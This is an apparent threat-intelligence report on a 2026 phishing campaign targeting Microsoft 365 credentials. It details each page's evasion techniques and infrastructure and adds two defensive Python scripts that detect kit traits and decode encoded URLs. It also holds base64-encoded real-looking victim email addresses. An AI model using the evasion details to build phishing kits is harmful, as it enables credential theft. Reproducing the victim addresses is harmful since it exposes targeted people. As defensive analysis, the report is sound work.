Between April 09, 2026 and April 22, 2026, analysts identified a highly sophisticated phishing campaign comprising 33 incidents that primarily targeted Microsoft and Office 365 credentials through advanced multi-stage authentication bypass techniques, with secondary targeting of Adobe, GoDaddy, and other enterprise services. The campaign demonstrated consistent use of adversary-in-the-middle (AiTM) proxying, JavaScript-based credential exfiltration through obfuscated external modules, and comprehensive multi-factor authentication harvesting capabilities that collected usernames, passwords, SMS codes, and authenticator app tokens across realistic authentication flows. Threat actors employed advanced evasion techniques including base64-encoded configuration data, randomized CSS class names, anti-bot honeypot fields, disabled right-click/text selection, and PageValidator security systems, while leveraging compromised legitimate domains (.vu, .de, .nl, .uk TLDs), Microsoft Azure infrastructure abuse, and Cloudflare-protected hosting to enhance credibility and avoid detection.
Notable emerging tactics included real-time WebSocket communication via Socket.IO for live credential forwarding, sophisticated brand impersonation spanning multiple service providers simultaneously, and the deployment of commercial-grade phishing-as-a-service kits with polymorphic code structures and professional UI animations designed to closely replicate legitimate Microsoft authentication workflows. The campaign's technical sophistication, combined with targeted personalization showing victim email addresses and systematic MFA bypass capabilities, represents a significant escalation in phishing attack complexity that poses substantial risk to organizations relying on traditional security awareness training and basic multi-factor authentication protections.
On April 20, 2026 and April 22, 2026, employees at a Kentucky organization clicked the above phishing page. This phishing page uses a multi-stage credential collection process that captures usernames via form submission to form_field_648, then passwords through form_box_142, followed by MFA codes through multiple verification forms (form_form_915 and form_section_533), with data likely exfiltrated through JavaScript modules loaded from the compromised capitolelectrics.com domain. The page employs several sophisticated evasion techniques including obfuscated base64-encoded configuration data (prop_flag_852, prop_status_731), randomized CSS class names to avoid detection signatures, honeypot fields with the a_block_503 class to detect automated analysis, and anti-inspection protections that disable right-click and text selection while loading bot detection modules.
The infrastructure leverages a compromised legitimate business website (capitolelectrics.com) with polymorphic JavaScript loading (module.php with dynamic parameters), and the page meticulously mimics Microsoft's authentication flow with realistic multi-factor authentication steps including authenticator app verification and SMS codes. This represents an advanced sophistication level due to its comprehensive MFA harvesting capabilities, multiple anti-analysis measures, and the realistic simulation of Microsoft's complete authentication pipeline including visual elements like blinking notification icons and entropy displays for authenticator apps.
On April 22, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page uses a sophisticated adversary-in-the-middle (AiTM) technique deployed through the Ultraviolet web proxy service hosted on cookieduck.com, which intercepts and proxies all traffic to the legitimate Microsoft login portal at login.microsoftonline.com while maintaining full visual fidelity. The primary credential capture method involves form submission to "https://login.microsoftonline.com/f54910a1-2cbc-42bf-9f0d-5466ba29ee46/login" but all requests are transparently proxied through the attacker's infrastructure using base64-encoded URLs in the format "aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL..." allowing real-time interception of credentials, session tokens, and MFA codes. Key TTPs include complete DOM manipulation with __uv-attr- prefixed attributes to maintain proxy functionality, JavaScript-based request interception through the Ultraviolet framework, and abuse of legitimate Microsoft SAML authentication flows. This represents an advanced sophistication level as it bypasses traditional security awareness training by presenting a pixel-perfect replica of the legitimate Microsoft login experience while capturing all authentication data in real time, making it extremely difficult for users to detect the deception.
On April 22, 2026, an employee at a Kentucky organization clicked the above phishing page. This Microsoft login phishing page employs a sophisticated multi-stage credential harvesting system that uses JavaScript fetch() calls to exfiltrate credentials through form submissions to external endpoints, with the primary capture mechanism appearing to be through dynamically configured form handlers referenced in the obfuscated base64-encoded configuration strings. The page demonstrates advanced evasion techniques including anti-debugging protections (disabled right-click and text selection), bot detection mechanisms through honeypot fields with the "a_block_239" class, and sophisticated social engineering through authentic Microsoft branding with real Microsoft CDN background images and multi-factor authentication simulation including SMS codes, authenticator app notifications, and verification workflows.
Notable infrastructure elements include hosting on a suspicious .vu domain with an extremely long randomized URL path, and the page loads external JavaScript files ("js/bSIbdr4xaTFP1Lr.js" and "js/rPMnFG5Dwk68Lehm.js") that likely contain the primary credential exfiltration logic. The sophistication level is advanced, featuring comprehensive MFA bypass capabilities, real-time form validation, loading animations to simulate legitimate authentication delays, and extensive code obfuscation through randomized CSS class names and base64-encoded configuration objects that mask the true functionality and endpoints.
On April 21, 2026 and April 22, 2026, employees at a Kentucky organization clicked the above phishing page. This sophisticated Microsoft authentication phishing page uses JavaScript-based multi-stage credential collection with form data being exfiltrated via fetch/XMLHttpRequest to endpoints controlled by the attackers, as evidenced by the extensive JavaScript configuration objects and module loading system. The page implements several advanced evasion techniques including anti-bot detection modules (bot-detection.js), honeypot fields with the class "a_module_306" positioned off-screen, disabled right-click and text selection, and obfuscated configuration data using base64 encoding (visible in prop_state_614 and prop_label_306 values).
The infrastructure appears to be hosted on a compromised or disposable domain (fryerclosings.cc) with a complex URL path structure containing random tokens, and the page features sophisticated social engineering with realistic Microsoft branding, multi-factor authentication simulation including SMS and authenticator app flows, and personalized elements showing "[email address from a Kentucky organization]" to build victim trust. The sophistication level is advanced, particularly notable for its comprehensive MFA collection capabilities, real-time validation system, polymorphic code structure with randomized CSS class names, and the systematic progression through username, password, and various 2FA verification methods to maximize credential harvesting.
On April 22, 2026, employees at a Kentucky organization clicked the above phishing page. This phishing page uses a multi-stage credential harvesting approach that dynamically loads JavaScript modules to capture Microsoft login credentials, with form data likely exfiltrated via the obfuscated `module.php` endpoint using encoded parameters and polymorphic code structure. The site employs sophisticated evasion techniques including anti-bot honeypot fields, disabled text selection and right-click protection, base64-encoded configuration variables, randomly-named CSS classes, and integration with legitimate GoGuardian security services to avoid detection.
Notable TTPs include mimicking Microsoft's authentic login flow with multiple authentication stages (password, MFA codes, authenticator app verification), stealing legitimate Microsoft background images from `msauthimages.net`, and implementing detailed error handling with contextual messaging to maintain victim engagement. The infrastructure appears to be a compromised legitimate domain (`greatlakestiles.net`) hosting the phishing kit, representing a moderately sophisticated operation that combines technical evasion measures with high-fidelity social engineering that closely replicates Microsoft's actual authentication interface and workflow.
On April 22, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page captures credentials through a multi-stage JavaScript-based exfiltration system that mimics Microsoft's login flow, collecting email addresses, passwords, and MFA codes through form inputs that are processed by obfuscated JavaScript functions rather than traditional form POST submissions. The page employs sophisticated evasion techniques including base64-encoded configuration data (prop_text_881, prop_value_160), obfuscated function names with randomized identifiers, anti-debugging protections that disable right-click and text selection, and honeypot fields for bot detection using the a_module_215 class.
It demonstrates advanced social engineering through authentic Microsoft branding, realistic multi-factor authentication workflows including SMS codes and authenticator app verification, personalized messaging showing "[email address from a Kentucky organization]", and convincing loading animations and progress indicators. The infrastructure uses the suspicious domain tradoroex.cfd with an extremely long obfuscated URL path, and the code references external JavaScript files (hg8KV2azKWZo2Ng.js, yAYktcSKbCfWyPSS.js) that likely contain the actual credential transmission logic, indicating a highly sophisticated phishing kit with modular architecture designed to evade detection and successfully harvest complete authentication credentials.
On April 21, 2026, an employee at a Minnesota organization clicked the above phishing page. This phishing page uses a multi-stage credential capture technique that initially submits credentials via AJAX POST to "processmail.php" and implements a sophisticated fake MFA flow by requesting OTP codes through a second form posting to "process.php". The site employs brand impersonation by mimicking Adobe Document Cloud with logos and styling, presents multiple email provider options (Outlook, Office365, Yahoo, AOL) to cast a wide net, and uses social engineering tactics including urgency ("enter valid email credentials that this file was sent to") and fake error messages ("Incorrect Password" after first attempt to encourage re-entry).
The page demonstrates moderate sophistication through its multi-modal approach, JavaScript-driven form handling that prevents actual form submission while capturing data via AJAX, animated loading indicators and progress flows to maintain user engagement, and a realistic two-factor authentication simulation that likely captures both passwords and MFA codes. The infrastructure appears to use a custom domain (ta-eq7.im) with Cloudflare services, and the professional styling with Bootstrap framework and Font Awesome icons suggests this is part of a well-developed phishing kit rather than a basic credential harvester.
On April 21, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page uses a standard HTML form that POSTs credentials to "https://fileopen.sustainableimpactpower.de/NNbg4/index.php" upon submission, with basic Bootstrap styling to mimic a legitimate login interface. The page employs minimal social engineering with a generic "Sign in to your account" title and uses the suspicious domain "sustainableimpactpower.de" which appears to be either compromised or attacker-controlled infrastructure rather than legitimate cloud hosting. The technique is basic credential harvesting without any JavaScript-based exfiltration, anti-analysis measures, or sophisticated evasion techniques - just a straightforward form submission to capture username/password pairs. The overall sophistication level is low, representing a standard credential phishing approach without advanced features like real-time validation, multi-factor authentication collection, or dynamic content manipulation.
On April 21, 2026, an employee at a Kentucky organization clicked the above phishing page. This Microsoft-themed phishing page employs a multi-stage credential collection process that captures email addresses and passwords through standard form submissions while using Socket.IO WebSocket connections for real-time communication with the attacker's server. The page implements sophisticated social engineering tactics including Microsoft Authenticator app impersonation with fake two-factor authentication codes, urgency messaging about "sensitive information" verification, and detailed Microsoft Office 365 branding with legitimate Microsoft CDN resources for logos and styling.
The infrastructure leverages the domain "adetechmechanic.com" which appears to be a compromised or purchased domain rather than a major cloud service, and the URL contains base64-encoded parameters that likely contain victim targeting information and session tracking data. The sophistication level is moderate-to-advanced due to the real-time WebSocket communication capabilities, multi-factor authentication bypass techniques, and the comprehensive Microsoft ecosystem impersonation that includes OneDrive interface elements and detailed Office 365 styling.
On April 21, 2026, an employee at a Kentucky organization clicked the above phishing page. This Microsoft phishing page uses JavaScript-based credential exfiltration through a dynamically loaded module (module.php) rather than standard form POST submission, with multi-stage collection capturing email, password, and MFA codes across different sections. Key TTPs include extensive code obfuscation with base64-encoded configuration data, randomized CSS class names for evasion, honeypot fields for bot detection, anti-inspection techniques (disabled right-click, text selection), and sophisticated UI mimicry including Microsoft branding, loading animations, and realistic error messages.
The page is hosted on a suspicious domain (clbruks.com) with a long obfuscated path, implements real-time view transitions between authentication stages, and includes anti-analysis measures like GoGuardian script injection detection and polymorphic code structure with security tokens and timestamps. This represents an advanced phishing kit with sophisticated evasion capabilities, multi-factor authentication bypass, and professional-grade social engineering elements designed to capture complete Microsoft account credentials and bypass modern security measures.
On April 21, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page uses a sophisticated multi-layered JavaScript-based credential capture system that appears to exfiltrate data through external JavaScript files (vhe4vF13CCpvIGp.js and WddTubribbvyFHXg.js) rather than traditional form submission, with the actual endpoints obfuscated within those external scripts. The page employs several advanced evasion techniques including anti-bot honeypot fields (a_block_105 class with hidden positioning), comprehensive anti-analysis measures that disable right-click and text selection, user-agent filtering through a PageValidator system with development and strict presets, and sophisticated loading screens with Microsoft-branded animations to increase legitimacy.
The infrastructure leverages the suspicious domain "monilyex.cfd" with an extremely long obfuscated URL path, while the page meticulously mimics Microsoft's authentic login interface including legitimate Microsoft CDN resources for background images, official Segoe UI font stacks, and accurate color schemes (#0067b8 Microsoft blue). The sophistication level is advanced, particularly notable for its comprehensive anti-debugging protections, the PageValidator security system that appears to fingerprint the environment before allowing access, and the use of base64-encoded configuration values in the phpConfig object that likely contain the actual exfiltration endpoints.
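The kit traits catalogued in the entries above (off-screen honeypot inputs, disabled right-click and text selection, base64-encoded configuration literals, kit-style identifiers such as a_block_503 and prop_flag_852, randomized CSS class names, and parameterized module.php loaders) recur almost verbatim in the later entries for prochemsgroup.net, grupoalvoseg.com.br and infoaescaffoldinq.co.uk. The following is an added example, not code from the report or from any of the kits it describes: a static triage check a SOC can run over a saved copy of a suspicious page to surface those traits. It assumes the page HTML is available offline; the sample HTML is constructed, and the only values taken from the report are the identifier naming pattern and the module.php loader name.

```python
"""Static triage of a saved phishing page for the kit traits this report describes.
Added example, not code from the report or from any kit.  The sample HTML is constructed;
only the identifier pattern (a_block_503, prop_flag_852, var_context_865) and the
module.php loader name are taken from the report."""
import base64
import math
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

KIT_ID_RE = re.compile(r"\b(?:a|prop|var)_[a-z]+_\d{3}\b")  # a_block_503-style names
B64_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")  # quoted base64, >= 40 chars
OFFSCREEN_RE = re.compile(r"(?:left|top)\s*:\s*-\d{3,}px|display\s*:\s*none|opacity\s*:\s*0\b", re.I)


class _PageModel(HTMLParser):
    """Collect forms, inputs, script sources, class tokens and inline on* handlers."""

    def __init__(self):
        super().__init__()
        self.forms, self.inputs, self.scripts, self.classes, self.handlers = [], [], [], [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        self.handlers.extend((k, v) for k, v in a.items() if k.startswith("on") and v)
        if a.get("class"):
            self.classes.extend(a["class"].split())
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "has_password": False})
        elif tag == "input":
            self.inputs.append(a)
            if self.forms and (a.get("type") or "").lower() == "password":
                self.forms[-1]["has_password"] = True  # attribute to the most recent form
        elif tag == "script" and a.get("src"):
            self.scripts.append(a["src"])


def _entropy(s):
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))


def _looks_random(token):
    # Long, mixed-case, digit-bearing, high-entropy: not a human-named CSS class.
    return bool(len(token) >= 12 and re.fullmatch(r"[A-Za-z0-9_]+", token)
                and re.search(r"\d", token) and re.search(r"[a-z]", token)
                and re.search(r"[A-Z]", token) and _entropy(token) > 3.3)


def scan_page(html, brand_host="microsoftonline.com"):
    """Return (indicator, evidence) pairs found in one page's HTML."""
    model = _PageModel()
    model.feed(html)
    findings = []
    # 1. Honeypot inputs: visible-type fields pushed off-screen or carrying kit ids.
    for inp in model.inputs:
        style, cls = inp.get("style") or "", inp.get("class") or ""
        if (inp.get("type") or "text").lower() != "hidden" and (
                OFFSCREEN_RE.search(style) or KIT_ID_RE.search(cls)):
            findings.append(("honeypot_field", inp.get("name") or cls))
    # 2. Anti-inspection: context menu / selection blocked, user-select: none.
    for attr, value in model.handlers:
        if attr in ("oncontextmenu", "onselectstart", "ondragstart") and "false" in value:
            findings.append(("anti_inspection", f"{attr}={value}"))
    if re.search(r"user-select\s*:\s*none", html, re.I):
        findings.append(("anti_inspection", "user-select: none"))
    # 3. Long quoted base64 literals that decode to printable text (hidden configuration).
    for lit in B64_LITERAL_RE.findall(html):
        try:
            decoded = base64.b64decode(lit, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if decoded.isprintable():
            findings.append(("base64_config", decoded))
    # 4. Kit-style identifiers anywhere, and a cluster of randomized class names.
    kit_ids = sorted(set(KIT_ID_RE.findall(html)))
    if kit_ids:
        findings.append(("kit_identifiers", ",".join(kit_ids)))
    random_classes = [c for c in set(model.classes) if _looks_random(c)]
    if len(random_classes) >= 3:
        findings.append(("randomized_classes", f"{len(random_classes)} high-entropy class names"))
    # 5. A password form whose action host is not the impersonated brand's.
    for form in model.forms:
        host = urlparse(form["action"]).hostname or ""
        if form["has_password"] and host != brand_host and not host.endswith("." + brand_host):
            findings.append(("offbrand_password_post", form["action"] or "(relative action)"))
    # 6. Parameterised server-side script loaders such as module.php?...
    for src in model.scripts:
        if urlparse(src).path.endswith(".php") and "?" in src:
            findings.append(("dynamic_script_loader", src))
    return findings


# Constructed samples, not captured pages.
_CONFIG_B64 = base64.b64encode(b"https://example-kit.invalid/api/submit").decode()
SAMPLE_PHISH = f"""<html><body style="user-select:none" oncontextmenu="return false" onselectstart="return false">
<script>var prop_flag_852 = "{_CONFIG_B64}"; var var_context_865 = 1;</script>
<form action="https://kit.example.invalid/module.php" method="post"><div class="CHyAgqPbx_yuoH5uy3fA"><input name="loginfmt" type="email"></div>
<div class="WMxS1J6ioJ9mX7X1"><input name="passwd" type="password"></div>
<div class="Qp8zT3vLkXaW2mRb"><input name="website" class="a_block_503" style="position:absolute;left:-9999px"></div>
<button class="Zk9Lm2QwErTyUiOp">Sign in</button></form>
<script src="js/module.php?v=1713600000&amp;t=abc"></script></body></html>"""
SAMPLE_BENIGN = """<html><body><form action="https://login.microsoftonline.com/common/login" method="post">
<input name="loginfmt" type="email" class="form-control"><input name="passwd" type="password" class="form-control">
</form></body></html>"""
```

Each indicator is weak on its own (some legitimate sites block the context menu, and build tools emit hashed class names), so the output is meant to be scored rather than alerted on directly, with the off-brand password post and the honeypot field carrying the most weight; the benign sample, a password form posting to the impersonated brand's own host, produces no findings.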
On April 20, 2026, employees at a Kentucky organization clicked the above phishing page. This phishing page appears to be an attack simulation framework rather than an active credential harvesting attempt, as evidenced by the title "Attack Simulation" and extensive JavaScript code for educational overlays and modals explaining phishing techniques to users. The page mimics a Microsoft Office 365 login interface with sophisticated visual elements including Microsoft branding, Segoe UI fonts, and responsive design, but the primary functionality focuses on displaying educational content through various overlay components (modal dialogs, tooltips, and notification banners) rather than actual credential capture.
The infrastructure appears to be hosted on a legitimate domain (officentry.com) and includes professional-grade CSS frameworks and accessibility features, suggesting this is a sanctioned security awareness training tool rather than a malicious phishing kit. The sophistication level is moderate to advanced in terms of visual fidelity and user experience design, but the technical implementation prioritizes education delivery over credential theft, making this appear to be a legitimate phishing simulation used for security training purposes.
Timeline by Organization:
On April 13, 2026, April 14, 2026, April 17, 2026, and April 20, 2026, employees at a Georgia organization clicked the above phishing page.
On April 13, 2026, April 14, 2026, April 16, 2026, and April 20, 2026, employees at a Kentucky organization clicked the above phishing page.
On April 20, 2026, an employee at a Minnesota organization clicked the above phishing page.
On April 14, 2026, an employee at a Utah organization clicked the above phishing page.
This phishing page primarily uses social engineering and fake security alerts rather than traditional credential capture - there are no active form submissions or JavaScript exfiltration methods, as all input fields are disabled with the "disabled" attribute. The page employs sophisticated visual deception tactics including a convincing Microsoft Support interface clone, multiple fake security pop-ups displaying "Password required for System32" and "Memory access violation" errors, fake SmartScreen warnings, and a prominent phone number (+1 (855)509-6686) presented as the primary call-to-action across multiple UI elements. Hosted on Microsoft Azure's web.core.windows.net infrastructure and delivered via Facebook advertising (evident from fbclid and utm parameters), this represents a moderate-sophistication tech support scam that relies entirely on phone-based social engineering rather than automated credential theft. The page is notable for its comprehensive visual mimicry of Windows security interfaces and its use of legitimate Microsoft hosting to enhance credibility, but lacks any actual malicious code execution or data collection mechanisms.
Related subdomain variants:
On April 20, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page employs sophisticated Microsoft Azure Active Directory impersonation with credential capture primarily through form POST to "/common/login" on the malicious domain ranksizexxl.club, while implementing extensive JavaScript-based evasion techniques including base64-encoded username parameters (bG9yZWxsZS53b290b25AbGVzbGllLmt5c2Nob29scy51cw==), browser fingerprinting through the $Config object, and anti-debugging mechanisms via WebWatson error handling systems.
The infrastructure demonstrates advanced tactics by hosting the phishing kit on a disposable domain while maintaining references to legitimate Microsoft CDN resources (aadcdn.msftauth.net) to blend malicious and legitimate content, and incorporates real-time session state management through multiple endpoints including GetCredentialType and GetOneTimeCode for potential MFA bypass attempts. The sophistication level is advanced due to the comprehensive replication of Microsoft's authentication flow, extensive JavaScript obfuscation and evasion techniques, targeted victim pre-filling (decoded email suggests educational institution targeting), and the multi-stage credential collection process that mimics legitimate OAuth flows while redirecting to attacker infrastructure.
On April 20, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page uses a standard HTML form submission method for credential capture, posting to an unspecified endpoint (the form action is not visible in the provided HTML snippet). The page employs several notable TTPs including base64 encoding in the URL fragment (#bGF1cmEuZ29yZG9uQHNoZWxieS5reXNjaG9vbHMudXM=) which decodes to what appears to be a target email address, extensive CSS obfuscation using randomized class names to evade detection, and integration with Socket.IO (loaded from cdnjs.cloudflare.com) suggesting potential real-time communication capabilities.
The page is hosted on a suspicious domain "the-healthy-foods.com" with a complex subdomain structure and an extremely long URL path containing random words, indicating a compromised or purpose-built phishing infrastructure. This represents a moderate sophistication level with the Socket.IO integration being particularly noteworthy as it could enable real-time credential forwarding or multi-stage attack coordination.
On April 20, 2026, an employee at a Kentucky organization clicked the above phishing page. This appears to be a sophisticated phishing page that impersonates Microsoft login while leveraging legitimate infrastructure for evasion. The page uses extensive CSS obfuscation with randomized class names (like "CHyAgqPbx_yuoH5uy3fA" and "WMxS1J6ioJ9mX7X1") and loads JavaScript libraries from employer.ipers.org, suggesting either compromised legitimate infrastructure or abuse of a trusted Iowa IPERS employer portal.
The credential capture method is not visible in the provided HTML truncation, but the page implements multiple layers of browser compatibility checking, uses legitimate jQuery CDN resources, and includes complex UI masking functions (window.VITECH.GWT.maskHTMLBody) that could hide malicious form submission endpoints. The sophistication level is moderate to advanced given the infrastructure abuse, extensive CSS obfuscation for anti-analysis, professional Microsoft branding mimicry, and the use of multiple overlapping UI frameworks that suggest this is part of a well-resourced phishing kit rather than a basic credential harvester.
On April 20, 2026, an employee at a Kentucky organization clicked the above phishing page. This Microsoft login phishing page uses JavaScript-based credential exfiltration through a dynamically loaded module (js/module.php) rather than traditional form POST submission, with credentials captured through multiple stages mimicking the authentic Microsoft authentication flow including username, password, MFA codes, and authenticator app verification. The page employs sophisticated evasion techniques including obfuscated configuration data stored in base64-encoded variables, anti-bot honeypot fields positioned off-screen, disabled text selection and right-click functionality, and polymorphic JavaScript loading with security tokens and timestamps.
Notable infrastructure indicators include hosting on prochemsgroup.net with an extremely long obfuscated URL path, and the page implements advanced social engineering through pixel-perfect Microsoft branding replication, realistic multi-step authentication flows with loading animations, and personalized elements showing "[email address from a Kentucky organization]" to increase victim trust. The sophistication level is advanced due to the real-time credential validation capabilities suggested by the bot detection modules, the complex state management system tracking user progression through authentication stages, and the professional implementation that closely mirrors legitimate Microsoft login processes including proper responsive design and accessibility features.
On April 20, 2026, an employee at an Illinois organization clicked the above phishing page. This phishing page uses a standard HTML form POST to "https://daubert.onthecornermanila.com/sos?redirect_urI=https%253A%252F%252Flogin.microsoftonline.com%252Fcommon%252Flogin" to capture Microsoft Office 365 credentials, with sophisticated Microsoft branding replication including authentic-looking CSS, JavaScript, and Microsoft logo assets loaded from legitimate Microsoft CDNs (aadcdn.msftauth.net). The page implements several notable TTPs including extensive JavaScript obfuscation with encoded configuration objects containing legitimate Microsoft OAuth URLs and session tokens, DNS prefetching to Microsoft domains to appear legitimate, and real Microsoft authentication flow simulation with proper CSRF tokens and session management.
The infrastructure uses a compromised or malicious domain (daubert.onthecornermanila.com) that redirects through encoded URLs to mask the final POST destination, while loading genuine Microsoft assets to maintain visual authenticity. This represents a moderate to advanced sophistication level due to its detailed replication of Microsoft's actual login infrastructure, proper implementation of anti-CSRF mechanisms, and the hybrid approach of using legitimate Microsoft CDN resources while intercepting credentials through the malicious domain's POST endpoint.
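The encoded URL components in several entries above can be unpacked by one log-side decoder: the Ultraviolet AiTM proxy entry carries the login.microsoftonline.com target as a base64-encoded path, the ranksizexxl.club and the-healthy-foods.com entries carry a base64-encoded victim address in a query parameter or URL fragment, and the onthecornermanila.com entry double percent-encodes its redirect target. The following is an added example, not code from the report or from any kit, that takes a URL as it would appear in proxy or mail-gateway logs and reports what its encoded parts hide. Its sample URLs are constructed (reserved .example hostnames, a placeholder mailbox), and the classification rules (decoded text that looks like a URL versus an e-mail address) are heuristics added here.

```python
"""Decode the URL encodings used by the proxied (AiTM) and pre-filled pages in this report.
Added example, not code from the report or from any kit.  Sample URLs are constructed."""
import base64
import re
from urllib.parse import unquote, urlparse

B64_TOKEN_RE = re.compile(r"^[A-Za-z0-9+/_-]{16,}={0,2}$")  # base64 or base64url, 16+ chars
EMAIL_RE = re.compile(r"^[\w.+-]+@[\w-]+(?:\.[\w-]+)+$")
URL_RE = re.compile(r"^https?://[^\s/]+", re.I)


def try_b64(token):
    """Decode a base64/base64url token to printable text; None if it is not one."""
    if not B64_TOKEN_RE.match(token):
        return None
    padded = token + "=" * (-len(token) % 4)  # tolerate stripped padding
    try:
        if "-" in token or "_" in token:
            raw = base64.urlsafe_b64decode(padded)
        else:
            raw = base64.b64decode(padded, validate=True)
        text = raw.decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def classify(text):
    if URL_RE.match(text):
        return "proxied_url"   # a login URL hidden in the path: the AiTM proxy pattern
    if EMAIL_RE.match(text):
        return "email"         # pre-filled victim address
    return "text"


def analyze_url(url):
    """Return (kind, detail) findings for one observed URL."""
    parts = urlparse(url)
    findings, seen = [], set()

    def consider(where, token):
        decoded = try_b64(token)
        if decoded and decoded not in seen:
            seen.add(decoded)
            findings.append((classify(decoded), f"{where}: {decoded}"))

    # Path: each segment alone, then each suffix of segments re-joined with '/',
    # because standard base64 may itself contain '/' and be split by the URL parser.
    segments = [s for s in parts.path.split("/") if s]
    for i in range(len(segments)):
        consider("path", segments[i])
        consider("path", "/".join(segments[i:]))

    # Query: check raw values for base64, and percent-decode until stable to expose
    # redirect targets that needed more than one round (double encoding).
    if parts.query:
        for pair in parts.query.split("&"):
            key, _, value = pair.partition("=")
            consider(f"query:{key}", value)
            rounds, current = 0, value
            while True:
                nxt = unquote(current)
                if nxt == current:
                    break
                current, rounds = nxt, rounds + 1
            if rounds >= 2 and URL_RE.match(current):
                findings.append(("double_encoded_redirect", f"{key} -> {current}"))

    if parts.fragment:
        consider("fragment", parts.fragment)
    return findings


# Constructed samples, not observed indicators.
SAMPLE_AITM = "https://proxy.example/service/" + base64.b64encode(
    b"https://login.microsoftonline.com/common/oauth2/v2.0/authorize").decode()
SAMPLE_PREFILL = "https://docs.example/secure/view/#" + base64.b64encode(
    b"jane.doe@example.org").decode()
SAMPLE_REDIRECT = ("https://files.example/sos?redirect_url="
                   "https%253A%252F%252Flogin.microsoftonline.com%252Fcommon%252Flogin")

if __name__ == "__main__":
    for sample in (SAMPLE_AITM, SAMPLE_PREFILL, SAMPLE_REDIRECT):
        print(sample)
        for kind, detail in analyze_url(sample):
            print(f"  {kind}: {detail}")
```

A single round of percent-decoding is normal for redirect parameters and is deliberately not flagged; only values that still contain encoded characters after the first decode are reported. Decoded e-mail addresses are personal data of the targeted user and should be handled as such in any alert that carries them.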
On April 20, 2026, an employee at a Minnesota organization clicked the above phishing page. This sophisticated Microsoft login phishing kit uses multi-stage JavaScript-based credential collection, capturing email, password, and MFA codes through fetch() requests to backend endpoints rather than simple form submissions, as evidenced by the complex state management system with randomized variable names (var_context_865, var_settings_582) and encoded configuration strings. The kit implements advanced evasion techniques including anti-debugging measures (user-select: none, right-click disabled), honeypot fields for bot detection (a_component_103 class with hidden positioning), randomized CSS class names throughout the codebase, and PageValidator/PageConfig security detection systems that likely fingerprint visitors and redirect suspicious traffic.
The infrastructure leverages Cloudflare services (evident from the beacon script) and includes base64-encoded configuration parameters, loading screen animations to appear legitimate, and a complete multi-step authentication flow mimicking Microsoft's actual login process including authenticator app verification and SMS 2FA collection. The sophistication level is advanced, featuring real-time form validation, dynamic content updates, and what appears to be a professionally developed phishing-as-a-service kit with extensive anti-analysis capabilities and multiple external JavaScript dependencies for enhanced functionality.
On April 20, 2026, employees at Kentucky and Texas organizations clicked the above phishing page. This phishing page uses a standard HTML form POST submission method to capture Microsoft 365 credentials, with the form likely submitting to the same domain or a backend script for credential harvesting. The page employs sophisticated Microsoft 365/Office 365 brand impersonation with authentic-looking styling, logos (including base64-encoded Microsoft logos), and CSS classes that mimic legitimate Microsoft login interfaces, creating a highly convincing replica of the real Office 365 sign-in experience.
The page is hosted on a suspicious domain (eminencekyschool.steadyoperations.de) that appears to be either a compromised legitimate site or a domain registered specifically for this campaign, using a German TLD to potentially appear more trustworthy. The sophistication level is moderate to advanced, as evidenced by the extensive CSS styling that closely replicates Microsoft's Fluent Design System, the use of proper form validation patterns, and the inclusion of multiple UI components like checkboxes, progress indicators, and responsive design elements that would fool most users. Notably, the page includes comprehensive GoDaddy branding and styling alongside Microsoft elements, suggesting this may be part of a broader campaign targeting multiple service providers or attempting to create confusion about the legitimate service being impersonated.
On April 17, 2026, an employee at a Florida organization clicked the above phishing page. This phishing page uses a standard HTML form that POSTs credential data to the same endpoint via an AJAX request using jQuery, with the captured email and password being sent to a validation endpoint identified by obfuscated variables 'validate' and 'verify' in the heavily obfuscated JavaScript code. The page employs several sophisticated evasion techniques including extensive JavaScript obfuscation using custom encoding schemes, anti-bot honeypot fields that redirect to a decoy URL if triggered, and multiple layers of string encoding/decoding functions that obscure the actual credential exfiltration logic.
The site impersonates both GoDaddy and Microsoft Office 365 branding simultaneously, includes caps lock detection, password visibility toggles, and appears to validate credentials in real-time before proceeding, suggesting integration with automated credential verification systems. The infrastructure leverages the .vu domain (Vanuatu) with what appears to be a compromised or bulletproof hosting setup, and the sophistication level is advanced due to the multi-layered obfuscation, anti-analysis measures, and dual-brand impersonation strategy designed to capture both hosting provider and email service credentials.
On April 17, 2026, an employee at an Illinois organization clicked the above phishing page. This phishing page uses a multi-stage credential capture system that collects Microsoft login credentials through standard HTML forms, with JavaScript handling progressive form submission and data exfiltration via a dynamically loaded module (module.php?m=auth) that processes username, password, and multi-factor authentication codes sequentially. The page implements sophisticated evasion techniques including obfuscated JavaScript variable names, base64-encoded configuration data, honeypot anti-bot fields, disabled right-click/text selection, and polymorphic code structure with randomized CSS class names and element IDs to evade detection systems.
Notable advanced features include real-time 2FA method detection that adapts the interface based on the victim's authentication setup (SMS, authenticator app, or email verification), dynamic background/logo customization, and anti-debugging protections with noscript redirects and developer tool detection. The infrastructure appears to leverage a compromised Brazilian domain (grupoalvoseg.com.br) with a complex URL structure containing encoded parameters, and the code quality suggests this is a sophisticated phishing kit rather than a basic credential harvester, likely capable of real-time credential validation and session hijacking.
On April 16, 2026 and April 17, 2026, employees at a Florida organization clicked the above phishing page. This Microsoft phishing page uses JavaScript-based credential exfiltration through the external scripts "tNXeHk14j2U313v.js", "bfgIX3aCsk19HgYr.js", and "FV1OcOognlhxJjkoDp9.js" rather than traditional form submission, with multi-stage credential collection spanning username, password, and MFA codes across different sections. The page implements sophisticated evasion techniques including anti-bot detection through the PageValidator security handler, anti-debugging protections that disable right-click and text selection, honeypot fields using the "a_wrapper_835" class positioned off-screen, and base64-encoded configuration data in variables like "var_state_402" and "var_settings_955" to obfuscate functionality.
